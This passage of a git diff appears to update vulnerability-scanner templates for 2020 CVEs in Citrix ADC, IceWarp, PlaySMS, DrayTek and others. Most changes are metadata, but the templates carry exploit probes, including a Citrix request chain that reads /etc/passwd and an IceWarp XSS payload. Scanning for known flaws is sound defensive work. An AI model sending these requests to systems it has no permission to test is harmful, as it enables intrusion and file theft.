cve,cve2020,rails,rce,hackerone http: - method: GET @@ -28,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 35f14de023..cc484cf49d 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml 
@@ -14,10 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8191 cwe-id: CWE-79 - epss-score: 0.00223 - tags: cve,cve2020,citrix,xss + epss-score: 0.0021 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix,xss http: - raw: @@ -32,15 +35,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + + - type: word + part: header + words: + - "text/html" - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 9e01b08c63..72772deb55 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -14,11 +14,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2020-8193 - cwe-id: CWE-862 - epss-score: 0.97456 - tags: cve,cve2020,citrix,lfi,kev,packetstorm + cwe-id: CWE-287,CWE-284 + epss-score: 0.97455 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix,lfi,kev,packetstorm http: - raw: @@ -30,19 +33,15 @@ http: X-NITRO-PASS: xWXHUJ56 - - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} @@ -52,7 +51,6 @@ http: rand_key: {{randkey}} - - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} 
@@ -64,16 +62,16 @@ http: cookie-reuse: true + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + extractors: - type: regex name: randkey # dynamic variable - part: body - internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" + internal: true part: body diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 1f9dc1c17d..7371960f70 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -4,7 +4,6 @@ info: name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection author: dwisiswant0 severity: medium - description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. reference: - https://support.citrix.com/article/CTX276688 @@ -14,10 +13,13 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8194 cwe-id: CWE-94 - epss-score: 0.97231 - tags: cve,cve2020,citrix + epss-score: 0.97325 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix http: - raw: @@ -29,14 +31,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "application/x-java-jnlp-file" - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 18c64c901d..10d054518e 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml 
@@ -17,11 +17,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-8209 cwe-id: CWE-22 + epss-score: 0.97223 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* - epss-score: 0.97245 - tags: cve,cve2020,citrix,lfi,xenmobile metadata: max-request: 1 + vendor: citrix + product: xenmobile_server + tags: cve,cve2020,citrix,lfi,xenmobile http: - method: GET @@ -30,11 +32,6 @@ http: matchers-condition: and matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: word part: header words: @@ -42,3 +39,8 @@ http: - "application/octet-stream" - "attachment;" condition: and + + - type: regex + part: body + regex: + - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index 6dccdbd2c6..a7d9fe9be5 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -13,11 +13,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-8497 cwe-id: CWE-306 - cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* epss-score: 0.002 - tags: cve,cve2020,fms,artica + cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: artica + product: pandora_fms + tags: cve,cve2020,fms,artica http: - method: GET diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 5e6086035c..50114ba1ca 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml 
@@ -16,27 +16,32 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8512 cwe-id: CWE-79 - cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* epss-score: 0.0046 + cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"icewarp" + vendor: icewarp + product: icewarp_server tags: edb,packetstorm,cve,cve2020,xss,icewarp http: - method: GET path: - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22' + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 1f38556652..b210dcc95d 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -17,9 +17,12 @@ info: cve-id: CVE-2020-8515 cwe-id: CWE-78 epss-score: 0.97183 - tags: cve,cve2020,rce,kev + cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 + vendor: draytek + product: vigor2960_firmware + tags: cve,cve2020,rce,kev http: - raw: @@ -32,9 +35,9 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index dcc3f8376c..700abb019a 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -14,11 +14,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8641 cwe-id: CWE-22 - cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:*:*:*:*:*:*:*:* - epss-score: 0.00796 - tags: cve2020,lfi,lotus,cms,edb,cve + epss-score: 0.00709 + cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lotus_core_cms_project + product: lotus_core_cms + tags: cve2020,lfi,lotus,cms,edb,cve http: - method: GET 
@@ -27,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 5a8a0d4d9b..900d1f3a5a 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -10,15 +10,18 @@ info: - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html + - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8644 - cwe-id: CWE-74 + cwe-id: CWE-94 + epss-score: 0.95246 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* - epss-score: 0.94485 metadata: max-request: 2 + vendor: playsms + product: playsms tags: unauth,kev,packetstorm,cve,cve2020,ssti,playsms,rce http: @@ -27,7 +30,6 @@ http: GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 Host: {{Hostname}} @@ -39,18 +41,9 @@ http: cookie-reuse: true host-redirects: true max-redirects: 2 - extractors: - - type: xpath - name: csrf - part: body - attribute: value - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input matchers-condition: and matchers: - - type: word part: body words: @@ -59,3 +52,12 @@ http: - type: status status: - 200 + + extractors: + - type: xpath + name: csrf + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input + attribute: value + part: body diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index bf40ef7307..a5b3338a31 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml 
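Review bot: The relocated `csrf` extractor in CVE-2020-8644.yaml still locates the token by absolute position (`/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input`), so any layout or theme difference on the PlaySMS login page yields no match, and because it is `internal: true` the failure is silent — the second request goes out without a valid token and the template simply reports nothing. Selecting the input by its `name`/`type` attribute instead of its position would be more robust; the field name is not visible in this diff, so check it against the login form. Also note that `tbody` is frequently inserted by browser DOM builders and absent from the raw HTML, so an XPath copied from devtools may never match the server response — verify it against a raw fetch of the page.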
@@ -15,26 +15,19 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:*:*:*:*:*:*:*:* - epss-score: 0.05217 - tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 + epss-score: 0.06956 + cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: eyesofnetwork + product: eyesofnetwork + tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 http: - method: GET path: - "{{BaseURL}}/css/eonweb.css" - extractors: - - type: regex - name: version - internal: true - part: body - group: 1 - regex: - - '# VERSION : ([0-9.]+)' - matchers-condition: and matchers: - type: dsl @@ -49,3 +42,12 @@ http: - type: status status: - 200 + + extractors: + - type: regex + name: version + group: 1 + regex: + - "# VERSION : ([0-9.]+)" + internal: true + part: body diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index b4c28e2dc9..d6d6fcf5e7 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -15,11 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8771 cwe-id: CWE-287 - cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:*:*:* - epss-score: 0.0673 - tags: cve,cve2020,wordpress,wp-plugin + epss-score: 0.06142 + cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: wptimecapsule + product: wp_time_capsule + tags: cve,cve2020,wordpress,wp-plugin http: - raw: @@ -30,7 +33,6 @@ http: Accept: */* IWP_JSON_PREFIX - - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} @@ -38,19 +40,20 @@ http: Accept: */* cookie-reuse: true + matchers-condition: and matchers: - type: word + part: body words: - '